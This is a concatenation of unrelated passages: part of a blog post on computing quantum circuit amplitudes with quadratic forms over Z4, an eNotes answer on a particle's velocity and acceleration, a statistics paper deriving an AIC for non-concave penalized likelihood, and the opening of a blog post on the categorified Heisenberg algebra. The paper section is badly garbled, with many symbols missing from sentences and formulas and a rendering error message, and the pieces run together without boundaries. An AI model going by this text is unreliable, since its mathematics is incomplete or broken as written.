\!\!=\!\! \begin{bmatrix} 1 & 0 & 0 \\ 0 & 1 & 0 \\ 1 & 0 & 1 \end{bmatrix} \!\cdot\! \begin{bmatrix} 0 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix} \!\cdot Q^\top \!=\! \begin{bmatrix} 0 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 2 & 0 \end{bmatrix} \!\cdot\! \begin{bmatrix} 1 & 0 & 1 \\ 0 & 1 & 0 \\ 0 & 0 & 1 \end{bmatrix} \!=\! \begin{bmatrix} 0 & 1 & 0 \\ 1 & 0 & 2 \\ 0 & 2 & 0 \end{bmatrix} \!=\! D'.$ Now ${D'}$ has entries that are ${2}$ but they are off-diagonal, and hence cancel when ${y^\top D' y}$ is computed in the ${y}$-basis. Since ${w}$ is likewise the zero vector, this gives the transformed form as $\displaystyle f'_0(y_1,y_2,y_3) = 2y_1 y_2.$ It is easy to compute that ${f'_0}$ has six values of 0 and two values of 2, which gives the amplitude as the difference ${6 - 2}$ divided by the square root of ${2^6}$, so ${\frac{1}{2}}$, The probability of getting ${000}$ as the result of the measurement is ${\frac{1}{4}}$. Now suppose we insert a ${\mathsf{Z}}$-gate ${\begin{bmatrix} 1 & 0 \\ 0 & -1 \end{bmatrix}}$ on the first qubit to make a new circuit ${C_2}$. Since ${\mathsf{Z}}$ and ${\mathsf{CZ}}$ are diagonal in the standard basis it does not matter where between the Hadamard gates it goes, say: After substituting zeroes the form over ${\mathbb{Z}}$ is ${g = 2x_1 x_2 + 2 x_2 x_3 + 2x_1^2}$. This gives $\displaystyle S = \begin{bmatrix} 2 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix},\quad v = (1,0,0), \quad B = \begin{bmatrix} 0 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix}.$ The matrix ${B}$ is the same as in the first example, hence so are the matrices ${Q}$ and ${D}$ and the alternating status of ${g}$. The difference made by ${v}$ and the resulting ${w}$ makes itself felt when we re-compute over ${\mathbb{Z}_4}$: $\displaystyle Q S Q^{\top} \!\!=\!\! \begin{bmatrix} 1 & 0 & 0 \\ 0 & 1 & 0 \\ 1 & 0 & 1 \end{bmatrix} \!\cdot\! \begin{bmatrix} 2 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix} \!\cdot Q^\top \!=\! \begin{bmatrix} 2 & 1 & 0 \\ 1 & 0 & 1 \\ 2 & 2 & 0 \end{bmatrix} \!\cdot\! \begin{bmatrix} 1 & 0 & 1 \\ 0 & 1 & 0 \\ 0 & 0 & 1 \end{bmatrix} \!=\! \begin{bmatrix} 2 & 1 & 2 \\ 1 & 0 & 2 \\ 2 & 2 & 2 \end{bmatrix} \!=\! D'.$ Well, ${D'}$ is far from diagonal—perhaps we shouldn’t use that name—but again the off-diagonal ${2}$s are innocuous so we really have $\displaystyle D'' = \begin{bmatrix} 2 & 1 & 0 \\ 1 & 0 & 0 \\ 0 & 0 & 2 \end{bmatrix}.$ The ${2}$ at upper left does not zero out the amplitude, because it is within a ${2 \times 2}$ block. The ${2}$ at lower right, however, constitutes a ${1 \times 1}$ block of ${D''}$, so it signifies that ${000}$ is not a possible measurement outcome. Essentially what has happened is that in the ${y}$-basis the form has become $\displaystyle g'(y) = 2y_1^2 + 2y_1 y_2 + 2y_3^2.$ The isolated term in ${y_3}$ contributes ${+2}$ mod ${4}$ to half the ${0}$${1}$ assignments so as to cancel the other half, leaving a difference of ${0}$ in the numerator of the amplitude. For the third example, let us insert a phase gate ${\mathsf{S}}$ after the ${\mathsf{Z}}$ to make a circuit ${C_3}$: The ${\mathsf{ZS}}$ combination is the same as ${\mathsf{S^*}}$, the adjoint (and inverse) of ${\mathsf{S}}$. Now after substitutions we have ${h_{C_3}(x) = 2x_1 x_2 + 2 x_2 x_3 + 3x_1^2}$, giving: $\displaystyle S = \begin{bmatrix} 3 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix},\quad v = (1,0,0), \quad B = \begin{bmatrix} 1 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix}.$ Note that ${B}$ is still a 0-1 matrix. This ${B}$ has full rank. Again it helps our exposition that ${B}$ is diagonalizable without swaps (and that the inverse of an invertible lower-triangular matrix is lower-triangular), so we can find ${QBQ^\top = D = I}$ with $\displaystyle Q = \begin{bmatrix} 1 & 0 & 0 \\ 1 & 1 & 0 \\ 1 & 1 & 1 \end{bmatrix}.$ In the ${y}$-basis we get ${h'(y) = y_1 + y_2 + y_3 + 2(y \bullet w)}$ for some ${w}$. To test for zero amplitude—before we know what ${w}$ is—we compute in ${\mathbb{Z}_4}$: $\displaystyle Q S Q^{\top} \!\!=\!\! \begin{bmatrix} 1 & 0 & 0 \\ 1 & 1 & 0 \\ 0 & 1 & 1 \end{bmatrix} \!\cdot\!\begin{bmatrix} 3 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix} \!\cdot Q^{\top} \!=\! \begin{bmatrix} 3 & 1 & 0 \\ 0 & 1 & 1 \\ 0 & 2 & 1 \end{bmatrix} \!\cdot\! \begin{bmatrix} 1 & 1 & 1 \\ 0 & 1 & 1 \\ 0 & 0 & 1 \end{bmatrix} \!=\! \begin{bmatrix} 3 & 0 & 0 \\ 0 & 1 & 2 \\ 0 & 2 & 3 \end{bmatrix} \!=\! D'.$ Again we can ignore the off-diagonal ${2}$‘s. There is no ${2}$ on the main diagonal, so we know the amplitude is non-zero. To compute it, we only need the information on the diagonal, which tells us ${h'_0(y) = y_1 + y_2 + y_3}$ and ${w = (1,0,1)}$ in the transformed basis. Note that we could have written ${h'_0(y)}$ down the moment we learned that ${B}$ has rank ${3}$ over ${\mathbb{F}_2}$, so ${w}$ is the only rigmarole. The final analysis—using a recursion detailed in the appendix of our paper—gives the amplitude as $\displaystyle \frac{2 - 2i}{8} = \frac{1 - i}{4},$ and so the probability of the output ${000}$ is ${\frac{1}{8}}$. We remark finally that ${w}$ is generally not the same as ${Qv}$. To see where it comes from, let us now compute ${Q B Q^{\top}}$ (not ${QSQ^\top}$) over ${\mathbb{Z}_4}$ to get ${QBQ^\top = D + 2U}$. Then $\displaystyle \begin{array}{rcl} f(x) &=& x^\top B x + 2x^\top v = x^\top Q^{-1} (D+2U) (Q^\top)^{-1} x + 2x^\top (Q^{-1} Q) v\\ &=& y^\top (D + 2U) y + 2 y^\top Qv, \end{array}$ where ${y = (Q^\top)^{-1} x}$. Now off-diagonal elements in ${2U}$ will cancel when taking ${2 y^\top U y}$ modulo 4, so we need only retain the diagonal ${u}$ of ${U}$ as a binary vector. Since ${y}$ is binary, ${y^\top \mathit{diag}(u) y = y^\top u}$. This finally gives $\displaystyle f(x) = y^\top D y + 2y^\top (u + Qv) = y^\top D y + 2(y \bullet w)$ with ${w = u + Qv}$. In the third example we have ${Qv = (1,1,1)}$ and $\displaystyle QBQ^{\top} = \begin{bmatrix} 1 & 0 & 0 \\ 1 & 1 & 0 \\ 0 & 1 & 1 \end{bmatrix} \cdot \begin{bmatrix} 1 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix} \cdot Q^\top = \begin{bmatrix} 1 & 1 & 0 \\ 2 & 1 & 1 \\ 2 & 2 & 1 \end{bmatrix} \cdot \begin{bmatrix} 1 & 1 & 1 \\ 0 & 1 & 1 \\ 0 & 0 & 1 \end{bmatrix} = \begin{bmatrix} 1 & 2 & 2 \\ 2 & 3 & 0 \\ 2 & 0 & 1 \end{bmatrix}.$ The diagonal gives ${u = (0,1,0)}$ and so ${w = u + Qv \pmod{2} = (1,0,1)}$. This agrees with what we read off above by comparing ${D'}$ with ${D}$. There is a different worked-out example for the triangle graph on three vertices in the paper. Chaowen and I continue to be interested in shortcuts to computing the amplitude and/or probability. Here we take a cue from how Volker Strassen titled his famous 1969 paper on matrix multiplication: “Gaussian Elimination is not Optimal.” We would like to find cases where we can say, “Matrix Multiplication is not Optimal.” In view of recent papers blunting efforts to show ${\omega = 2}$—see this post—the question may shift to which computations may not need the full power of matrix multiplication and be achievable in ${O(n^2)}$ time after all. This applies to computing the rank (over ${\mathbb{Z}_2}$) itself, and the question extends to sparse cases like those considered in the paper, “Fast Matrix Rank Algorithms and Applications,” by Ho Yee Cheung, Tsz Chiu Kwok, and Lap Chi Lau. The second circuit in the above example corresponds to a graph with a self-loop at node 1—or, depending on how one counts incidence of self-loops in undirected graphs, one could call it a double self-loop. It exemplifies circuits used to create quantum graph states, and those circuits are representative of stabilizer circuits in general. The third circuit can be said to have a “triple loop,” or maybe better, a “3/2-loop”—while if the original ${\mathsf{Z}}$-gate were a single ${\mathsf{S}}$-gate giving the form ${x_1^2 + 2x_1 x_2 + 2 x_2 x_3}$, we would face the ambiguity of calling it a “loop” or a “half-loop.” Sorting this out properly needs going beyond graph theory. In upcoming posts, Chaowen and I will say more about how all this yields new problems in graph theory and new connections between quantum computing and matroid theory. ## Open Problems What do our results say about the problem of computing the rank of a matrix, and possibly separating it from dependence on matrix multiplication? We hope that we have begun to convey how our paper uncovers a lot of fun computational mathematics. We are grateful for communications from people we’ve approached (some acknowledged in our paper) about possible known connections, but there may be more we don’t know. Our next posts will say more about combinatorial aspects of quantum circuits. [fixed name] 1. June 5, 2019 2:07 am His name is Clément Pernet, not “Clemens” Pernet ;-). • June 5, 2019 7:21 am Oops, thanks!
# The position vector of a particle is given by r(t)=t^3*i+t^2*j. What are it's velocity speed and acceleration when t=2 Tushar Chandra | Certified Educator calendarEducator since 2010 starTop subjects are Math, Science, and Business We have the position vector given in terms of time t. r(t) = t^3*i + t^2*j To find the velocity vector we have to differentiate r(t) with respect to time. r'(t) = 3t^2*i + 2t*j The vector representing acceleration is the derivative of the position vector r''(t) = 6t*i + 2*j When time t = 2. The velocity vector is 3*2^2*i + 2*2*j => 12*i + 4*j The speed is the absolute value of the velocity vector or sqrt(12^2 + 4^2) = sqrt (144 + 16) = sqrt 160 The acceleration vector is 6*2*i + 2*j => 12*i + 2*j The required acceleration at t=2 is 12*i + 2*j and the speed is sqrt 160. check Approved by eNotes Editorial ## Related Questions giorgiana1976 | Student The velocity is given by the 1st derivative of r(t). We'll differentiate r(t) with respect to t. v(t) = r'(t) = 3t^2*i+ 2t*j The acceleration is given by the 1st derivative of v(t). We'll differentiate v(t) with respect to t. a(t) = v'(t) = 6t*i + 2j The speed is: |v(t)| = sqrt[(3t^2)^2 + (2t)^2] |v(t)| = sqrt(9t^4 + 4t^2) We'll put t = 2 and we'll get: v(2) = 3*(2)^2*i+ 4*j v(2) = 12i + 4j a(2) = 12i + 2j |v(2)| = sqrt(144+ 16) |v(2)| = sqrt(160) |v(2)| = 4sqrt10 The velocity and acceleration of the particle, when t=2, are: v(2) = 12i + 4j ; a(2) = 12i + 2j and |v(2)| = 4sqrt10.
A Proofs AIC for the Non-concave Penalized Likelihood Method Abstract Non-concave penalized maximum likelihood methods, such as the Bridge, the SCAD, and the MCP, are widely used because they not only perform the parameter estimation and variable selection simultaneously but also are more efficient than the Lasso. They include a tuning parameter which controls a penalty level, and several information criteria have been developed for selecting it. While these criteria assure the model selection consistency, they have a problem in that there are no appropriate rules for choosing one from the class of information criteria satisfying such a preferred asymptotic property. In this paper, we derive an information criterion based on the original definition of the AIC by considering minimization of the prediction error rather than model selection consistency. Concretely speaking, we derive a function of the score statistic that is asymptotically equivalent to the non-concave penalized maximum likelihood estimator and then provide an estimator of the Kullback-Leibler divergence between the true distribution and the estimated distribution based on the function, whose bias converges in mean to zero. Furthermore, through simulation studies, we find that the performance of the proposed information criterion is about the same as or even better than that of the cross-validation. KEY WORDS: information criterion; Kullback-Leibler divergence; regularization; statistical asymptotic theory; tuning parameter; variable selection. 1 Introduction The Lasso (Tibshirani 1996) is a regularization method that imposes an penalty term on an estimating function with respect to an unknown parameter vector , where is a tuning parameter controlling a penalty level. The Lasso can simultaneously perform estimation and variable selection by exploiting the non-differentiability of the penalty term at the origin. Concretely speaking, if is the estimator based on the Lasso, several of its components will shrink to exactly 0 when is not close to 0. However, a parameter estimation based on the Lasso is not necessarily efficient, because the Lasso shrinks the estimator to the zero vector too much. To avoid such a problem, it has been proposed to use a penalty term that does not shrink the estimator with a large value. Typical examples of such regularization methods are the Bridge (Frank and Friedman 1993), the smoothly clipped absolute deviation (SCAD; Fan and Li 2001), and the minimax concave penalty (MCP; Zhang 2010). Whereas the Bridge uses an penalty term (), SCAD and MCP use penalty terms that can be approximated by an penalty term in the neighborhood of the origin, which we call an type. Although it is difficult to obtain estimates of them as their penalties are non-convex, there are several algorithms, such as the coordinate descent method and the gradient descent method that assure convergence to a local optimal solution. On the other hand, in the above regularization methods, we have to choose a proper value for the tuning parameter , and this is an important task for appropriate model selection. One of the simplest ways of selecting is to use cross-validation (CV; Stone 1974). While the stability selection method (Meinshausen and Bühlmann 2010) based on subsampling in order to avoid problems caused by selecting a model based on only one value of would be nice, it carries with it a considerable computational cost as in CV. Recently, information criteria without such a problem have been developed (Yuan and Lin 2007; Wang et al. 2007, 2009; Zhang et al. 2010; Fan and Tang 2013). Here, by letting be the log-likelihood function and be the estimator of obtained by the above regularization methods, their information criteria take the form . Accordingly, model selection consistency is at least assured for some sequence that depends on at least the sample size . For example, the information criterion with is proposed as the BIC. This approach includes the results for the case in which the dimension of the parameter vector goes to infinity, and hence, it is considered to be significant. However, the choice of tuning parameter remains somewhat arbitrary. That is, there is a class of assuring a preferred asymptotic property such as model selection consistency, but there are no appropriate rules for choosing one from the class. For example, since the BIC described above is not derived from the Bayes factor, there is no reason to use instead of . This is a severe problem because data analysts can choose arbitrarily and do model selection as they want. Information criteria without such an arbitrariness problem have been proposed by Efron et al. (2004) or Zou et al. (2007) for Gaussian linear regression and by Ninomiya and Kawano (2014) for generalized linear regression. Concretely speaking, on the basis of the original definition of the or AIC, they derive an unbiased estimator of the mean squared error or an asymptotically unbiased estimator of a Kullback-Leibler divergence. However, these criteria are basically only for the Lasso. In addition, the asymptotic setting used in Ninomiya and Kawano (2014) does not assure even estimation consistency. Our goal in this paper is to derive an information criterion based on the original definition of AIC in an asymptotic setting that assures estimation consistency for regularization methods using non-concave penalties including the Bridge, SCAD, and MCP. To achieve it, the results presented in Hjort and Pollard (1993) are slightly extended to derive an asymptotic property for the estimator. Then, for the Kullback-Leibler divergence, we construct an asymptotically unbiased estimator by evaluating the asymptotic bias between the divergence and the log-likelihood into which the estimator is plugged. Moreover, we verify that this evaluation is the asymptotic bias in the strict sense; that is, the bias converges in mean to the evaluation. This sort of verification has usually been ignored in the literature (see, e.g., Konishi and Kitagawa 2008). The rest of the paper is organized as follows. Section 2 introduces the generalized linear model and the regularization method, and it describes some of the assumptions on our asymptotic theory. In Section 3, we discuss the asymptotic property of the estimator obtained from the regularization method, and in Section 4, we use it to evaluate the asymptotic bias, which is needed to derive the AIC. In Section 5, we discuss the moment convergence of the estimator to show that the bias converges in mean to our evaluation. Section 6 presents the results of simulation studies showing the validity of the proposed information criterion for several models, and Section 7 gives concluding remarks and mentions future work. The proofs are relegated to the appendixes. 2 Setting and assumptions for asymptotics Let us consider a natural exponential family with a natural parameter in for an -dimensional random variable , whose density is f(y;θ)=exp{yTθ−a(θ)+b(y)} with respect to a -finite measure. We assume that is the natural parameter space; that is, in satisfies . Accordingly, all the derivatives of and all the moments of exist in the interior of , and, in particular, and . For a function , we denote and by and , respectively. We also assume that is positive definite, and hence, is a strictly convex function with respect to . Let be the -th set of responses and regressors ; we assume that are independent -dimensional random vectors and in are -matrices of known constants. We will consider generalized linear models with natural link functions for such data (see McCullagh and Nelder 1989); that is, we will consider a class of density functions for ; thus, the log-likelihood function of is given by gi(β)=yTiXiβ−a(Xiβ)+b(yi), where is a -dimensional coefficient vector and is an open convex set. To develop an asymptotic theory for this model, we assume two conditions about the behavior of , as follows: • is a compact set with for all and . • There exists an invariant distribution on . In particular, converges to a positive-definite matrix . In the above setting, we can prove the following lemma. Lemma 1. Let be the true value of . Then, under conditions (C1) and (C2), we obtain the following: • There exists a convex and differentiable function such that for each . • converges to . • . See Ninomiya and Kawano (2014) for the proof. Note that we can explicitly write h(β)=∫X[a′(Xβ∗)TX(β∗−β)−{a(Xβ∗)−a(Xβ)}]μ(dX) (1) since we assume (C2), and hence, we can prove its convexity and differentiability without using the techniques of convex analysis (Rockafellar 1970). Let us consider a non-concave penalized maximum likelihood estimator, ^βλ=argminβ∈B{−n∑i=1gi(β)+n1/2p∑j=1pλ(βj)}, (2) where is a tuning parameter and is a penalty term with respect to , which is not necessarily convex. Letting , we assume that satisfies the following conditions; hereafter, we call it an type: • is not differentiable only at the origin, symmetric with respect to , and monotone non-decreasing with respect to . • . Such penalty terms for the Bridge, the SCAD, and the MCP are pBridgeλ(β) =λ|β|q, pSCADλ(β) =λ|β|1{|β|≤(r+1)λ}−(|β|−λ)2/(2r)1{λ<|β|≤(r+1)λ}+λ2(1+r/2)1{|β|>(r+1)λ}, and pMCPλ(β) =rλ2/2−(rλ−|β|)2/(2r)1{|β|≤rλ}, where and . The Bridge penalty is the Lasso penalty itself when , and it has the property that the derivative at the origin diverges when . For the SCAD and MCP penalties, condition (C4) on the behavior in the neighborhood of the origin is satisfied by setting , just like in the Lasso penalty. Thus, it is easy to imagine that a lot of penalties satisfy these conditions. Note that by using such penalties, several components of tend to exactly 0 because of the non-differentiability at the origin. Also note that is assumed not to depend on the subscript of the parameter for simplicity; this is not essential. While Ninomiya and Kawano (2014) put on the penalty term, we put on it in this study. From this, we can prove estimation consistency. Moreover, we can prove weak convergence of , although the asymptotic distribution is not normal in general. 3 Asymptotic behavior 3.1 Preparations Although the objective function in (2) is no longer convex because of the non-convexity of , the consistency of can be derived by using a similar argument to the one in Knight and Fu (2000). First, the following lemma holds. Lemma 2. is a consistent estimator of , that is, under conditions (C1)–(C4). This lemma is proved through uniform convergence of the random function, μn(β)=1nn∑i=1{gi(β∗)−gi(β)}−1n1/2p∑j=1{pλ(β∗j)−pλ(βj)}. (3) The details are given in Section A.1. Hereafter, we will denote by so long as there is no confusion. In addition, we denote and by and , respectively. Moreover, the vector and the matrix will be denoted by and , respectively, and we will sometimes express, for example, as . To develop the asymptotic property of the penalized maximum likelihood estimator in (2), which will be used to derive an information criterion, we need to make a small generalization of the result in Hjort and Pollard (1993), as follows: Lemma 3. Suppose that is a strictly convex random function that is approximated by . Let be a subvector of , and let and be continuous functions such that and converge to and uniformly over and in any compact set, respectively, and assume that is convex and . In addition, for νn(u)=ηn(u)+ϕn(u)+ψn(u†)and~νn(u)=~ηn(u)+ϕ(u)+ψ(u†), let and be the argmin of and , respectively, and assume that is unique and . Then, for any , and , there exists such that P(|un−~un|≥δ)≤P(2Δn(δ)+ε≥Υn(δ))+P(|un−~un|≥ξ)+P(|u†n|>γ), (4) where Δn(δ)=sup|u−~un|≤δ|νn(u)−~νn(u)|andΥn(δ)=inf|u−~un|=δ~νn(u)−~νn(~un). (5) Hjort and Pollard (1993) derived an inequality ; they assumed that is convex. Although is non-convex (hence is too), we will use the fact that converge to over . In fact, if is sufficiently large, the inequality satisfied by the convex function is approximately satisfied for ; that is, we have (1−δ/l)ϕn(~un)+(δ/l)ϕn(u)−ϕn(~un+δw)>−ε/2 (6) in . Here, is a unit vector such that , and is in , since . Moreover, if is sufficiently small and is sufficiently large, since , we have (1−δ/l)ψn(~u†n)+(δ/l)ψn(u†)−ψn(~u†n+δw†)>−ε/2 (7) in . Hence, we can show that P(|u†n|≤γ,δ≤|un−~un|≤ξ)≤P(2Δn(δ)+ε≥Υn(δ)) (8) in the same way as in Hjort and Pollard (1993), from which we obtain the above lemma. See Section A.2 for the details. 3.2 Limiting distribution We use Lemma 3 to derive the asymptotic property of the penalized maximum likelihood estimator in (2). Because the asymptotic property depends on the value of , we will develop our argument by setting . Furthermore, we will use for the sake of simplicity. Let us define a strictly convex random function, ηn(u(1),u(2))=n∑i=1{gi(β∗(1),β∗(2))−gi(u(1)n~q,u(2)n1/2+β∗(2))} (9) and ~ηn(u(1),u(2))=−u(2)Ts(2)n+u(2)TJ(22)u(2)/2, (10) where . By making a Taylor expansion around , can be expressed as −n∑i=1{1n~qu(1)Tg′(1)i(β∗)+1n1/2u(2)Tg′(2)i(β∗)} −n∑i=1{12n2~qu(1)Tg′′(11)i(β∗)u(1)+1n~q+1/2u(1)Tg′′(12)i(β∗)u(2)+12nu(2)Tg′′(22)i(β∗)u(2)} plus . Note that the term converges to from (R2), and the terms including reduce to . Accordingly, we see that is asymptotically equivalent to . Next, letting be and letting ϕn(u)=n1/2∑j∈J(2){pλ(ujn1/2+β∗j)−pλ(β∗j)} (11) and ψn(u†)=n1/2∑j∈J(1)pλ(ujn~q), (12) we can see from (C3) and (C4) that and uniformly converge to a function, ϕ(u)=u(2)Tp′(2)λandψ(u†)=λ∥u(1)∥qq, (13) over in a compact set, respectively, where . In addition, letting and , we see that the argmins of and are given by (u(1)n,u(2)n)=(n~q^β(1)λ,n1/2(^β(2)λ−β∗(2)))and(~u(1)n,~u(2)n)=(0,J(22)−1(s(2)n−p′(2)λ)). Note that is not convex but satisfies that . Using Lemma 3 together with the above preliminaries, we find that, for any , and , there exists such that P(|(u(1)n,u(2)n−~u(2)n)|≥δ) ≤P(2Δn(δ)+ε≥Υn(δ))+P(|(u(1)n,u(2)n−~u(2)n)|≥ξ)+P(|u(1)n|>γ), (14) where and are the functions defined in (5). The triangle inequality, the convexity of and the uniform convergence of and imply Δn(δ)≤ sup|(u(1),u(2)−~u(2)n)|≤δ|ηn(u(1),u(2))+u(2)Ts(2)n−u(2)TJ(22)u(2)/2| +sup|(u(1),u(2)−~u(2)n)|≤δ|ϕn(u)−ϕ(u)|+sup|(u(1),u(2)−~u(2)n)|≤δ|ψn(u†)−ψ(u†)| \lx@stackrelp→ 0. (15) Let be half the smallest eigenvalue of . Then, a simple calculation gives Υn(δ)=inf|(u(1),u(2)−~u(2)n)|=δ{λ∥u(1)∥qq+(u(2)−~u(2)n)TJ(22)(u(2)−~u(2)n)/2}≥min{λδq,ρδ2}. (16) From (15) and (16), by considering a sufficiently small and a sufficiently large , the first term on the right-hand side in (14) can be made arbitrarily small. In addition, we can generalize the result in Radchenko (2005) with respect to the model and the penalty term; thus, for any , we have P(|u(1)n|≤γ)→1and|un−~un|=Op(1). (17) See Section A.3 for the proof of (17). From this, by considering a sufficiently large and a sufficiently large , the second and third terms on the right-hand side in (14) can be made arbitrarily small. Thus, we conclude that u(1)n=op(1)andu(2)n=~u(2)n+op(1). Theorem 1. Let and Missing or unrecognized delimiter for \left (18) Under conditions (C1)–(C4), we have n1/(2q)^β(1)λ=op(1)andn1/2(^β(2)λ−β∗(2))=J(22)−1(s(2)n−p′(2)λ)+op(1) when , and we have n1/2^β(1)λ=^u(1)n+op(1) (19) and n1/2(^β(2)λ−β∗(2))=−J(22)−1J(21)^u(1)n+J(22)−1(s(2)n−p′(2)λ)+op(1) (20) when . We can obtain the result for the case of in almost the same way as in the case of (see Section A.4 for details). From Theorem 1, the estimator in (2) is shown to converge in distribution to some function of a Gaussian distributed random variable. When , we immediately see that it is 0 or the Gaussian distributed random variable itself, and this simple fact is useful for deriving an information criterion explicitly and reducing the computational cost of model selection. On the other hand, when , we can prove weak convergence, since the convex objective function in (18) converges uniformly from the convexity lemma in Hjort and Pollard (1993). Corollary 1. Let be a Gaussian distributed random variable with mean and covariance matrix and ^u(1)=argminu(1){u(1)TJ(1|2)u(1)/2−u(1)Tτλ(s)+λ∥u(1)∥1}. (21) Then, under the same conditions as in Theorem 1, we have n1/(2q)^β(1)λ\lx@stackreld→0andn1/2(^β(2)λ−β∗(2))\lx@stackreld→J(22)−1(s(2)−p′(2)λ) when , and we have n1/2^β(1)λ\lx@stackreld→^u(1)andn1/2(^β(2)λ−β∗(2))\lx@stackreld→−J(22)−1J(21)^u(1)+J(22)−1(s(2)−p′(2)λ) when . In the case of , we still need to solve the minimization problem in (21) for evaluating the AIC, but this is easy because the objective function is convex with respect to , so we can use existing convex optimization techniques. It is known that the proximal gradient method (Rockafellar 1976; Beck and Teboulle 2009) is effective for solving such a minimization problem when the objective function is the sum of a differentiable function and a non-differentiable function. We will use, however, the coordinate descent method (Mazumder et al. 2011) because the objective function can be minimized explicitly for each variable. Actually, when we fix all the elements of except for the -th one, is given by ^u(1)j=1J(1|2)jjsgn⎛⎝τj−∑k≠jJ(1|2)jk^u(1)k⎞⎠max⎧⎨⎩∣∣ ∣∣τj−∑k≠jJ(1|2)jk^u(1)k∣∣ ∣∣−λ,0⎫⎬⎭. Then, for the -th step in the algorithm, we have only to update as follows: u(t+1)j=argminuh(u(t+1)1,u(t+1)2,…,u(t+1)j−1,u,u(t)j+1,u(t)j+2,…,u(t)|J(1)|), for , and we repeat this update until converges. Note that the optimal value satisfies if and otherwise. 4 Information criterion From the perspective of prediction, model selection using the AIC aims to minimize twice the Kullback-Leibler divergence (Kullback and Leibler 1951) between the true distribution and the estimated distribution, 2~E[n∑i=1~gi(β∗)]−2~E[n∑i=1~gi(^βλ)], where is a copy of ; in other words, has the same distribution as and is independent of . In addition, and denote a log-likelihood function based on , that is, , and the expectation with respect to only , respectively. Because the first term is a constant, i.e., it does not depend on the model selection, we only need to consider the second term, and then the AIC is defined as an asymptotically biased estimator for it (Akaike 1973). A simple estimator of the second term in our setting is , but it underestimates the second term. Consequently, we will minimize the bias correction, −2n∑i=1gi(^βλ)+2E[n∑i=1gi(^βλ)−~E[n∑i=1~gi(^βλ)]], (22) in AIC-type information criteria (see Konishi and Kitagawa 2008). Because the expectation in (22), i.e., the bias term, depends on the true distribution, it cannot be explicitly given in general; thus, we will evaluate it asymptotically in the same way as was done for the AIC. For the Lasso, Efron et al. (2004) and Zou et al. (2007) developed the -type information criterion as an unbiased estimator of the prediction squared error in a Gaussian linear regression setting, in other words, a finite correction of the AIC (Sugiura 1978) in a Gaussian linear setting with a known variance. For the Lasso estimator , it can be expressed as n∑i=1{(yi−Xi^βλ)TV[yi]−1(yi−Xi^βλ)+log|2πV[yi]|}+2|{j;^βλ,j≠0}|, where the index set is called an active set. Unfortunately, since Stein’s unbiased risk estimation theory (Stein 1981) was used for deriving this criterion, it was difficult to extend this result to other models. In that situation, Ninomiya and Kawano (2014) relied on statistical asymptotic theory and extended the result to generalized linear models based on the asymptotic distribution of the Lasso estimator. The Lasso estimator in their paper is defined by ^βλ=argminβ∈B{−n∑i=1gi(β)+nλ∥β∥1}, but, as was mentioned in the previous section, estimation consistency is not assured because the order of the penalty term is . In this study, we derive an information criterion in a setting that estimation consistency holds as in Lemma 2 for not only the Lasso but also the non-concave penalized likelihood method. The bias term in (22) can be rewritten as the expectation of n∑i=1{gi(^βλ)−gi(β∗)}−n∑i=1{~gi(^βλ)−~gi(β∗)}, (23) so we can derive an AIC by evaluating , where is the limit to which (23) converges in distribution. We call an asymptotic bias. Here, we will develop an argument by setting . Using Taylor’s theorem, the first term in (23) can be expressed as (^βλ−β∗)Tn∑i=1g′i(β∗)+(^βλ−β∗)Tn∑i=1g′′i(β†)(^βλ−β∗)/2, (24) where is a vector on the segment from to . Note that
## July 10, 2012 ### Morton and Vicary on the Categorified Heisenberg Algebra #### Posted by John Baez Wow! It’s here! Back when I was working with Jeffrey Morton on categorifying the harmonic oscillator, I discovered to my surprise that there was another guy, a student of Chris Isham named Jamie Vicary, who was also categorifying the harmonic oscillator, using different but related ideas. Luckily, they started to collaborate… and they discovered some quite wonderful things. In quantum mechanics, position times momentum does not equal momentum times position! This sounds weird, but it’s connected to a very simple fact. Suppose you have a box with some balls in it, and you have the magical ability to create and annihilate balls. Then there’s one more way to create a ball and then annihilate one, than to annihilate one and then create one. Huh? Yes: if there are, say, 3 balls in the box to start with, there are 4 balls you can choose to annihilate after you’ve created one but only 3 before you create one. In quantum mechanics, when you’re studying the harmonic oscillator, it’s good to think about operators that create and annhilate… not balls, but ‘quanta of energy’. The creation operator is called $a^\dagger$ and the annihilation operator is called $a$, and the argument I just sketched can be used to show that $a a^\dagger = a^\dagger a + 1$ It’s a wonderful fact that you can express the position $q$ and momentum $p$ of the oscillator in terms of these creation and annihilation operators: $q = \frac{a + a^\dagger}{\sqrt{2}} , \qquad p = \frac{a - a^\dagger}{\sqrt{2} \, i}$ So the fact that position and momentum don’t commute, but instead obey $p q - q p = -i$ (in units where Planck’s constant is 1) can be seen as coming from the more intuitive fact that the annihilation and creation operators don’t commute, but instead obey $a a^\dagger - a^\dagger a = 1$ This insight, that funny facts about quantum mechanics are related to simple facts about balls in boxes, allows us to ‘categorify’ a chunk of quantum mechanics—including the Heisenberg algebra, which is the algebra generated by the position and momentum operators. Now is not the time to explain what that means. The important thing is that Mikhail Khovanov figured out a seemingly quite different way to categorify the same chunk of quantum mechanics, so there was a big puzzle about how his approach relates to the one I just described. Jeffrey Morton and Jamie Vicary have solved that puzzle. The big spinoff is this. Khovanov’s approach showed that in categorified quantum mechanics, a bunch of new equations are true! These equations are ‘higher analogues’ of Heisenberg’s famous formula $p q - q p = -i$ So, these new equations should be important! But they look very mysterious at first: In fact, when I first saw them, it seemed as if Khovanov had just plucked them randomly from thin air! Of course he had not: they arose from the representation theory of symmetric groups. But their intuitive meaning was far from transparent. Now Jeffrey and Jamie have shown how to get these equations just by thinking about balls in boxes. The equations in fact make perfect sense! See Section 2.8: Combinatorial Interpretation for details. Let me just get you started. We should replace the equation $a^\dagger a + 1 = a a^\dagger$ by an isomorphism $a^\dagger a + 1 \stackrel{\sim}{\Rightarrow} a a^\dagger$ This provides a one-to-one correspondence between ‘ways to annihilate a ball and then create one… together with one more thing’ and ‘ways to create a ball and then annihilate it’. This isomorphism is built from two parts: $f: 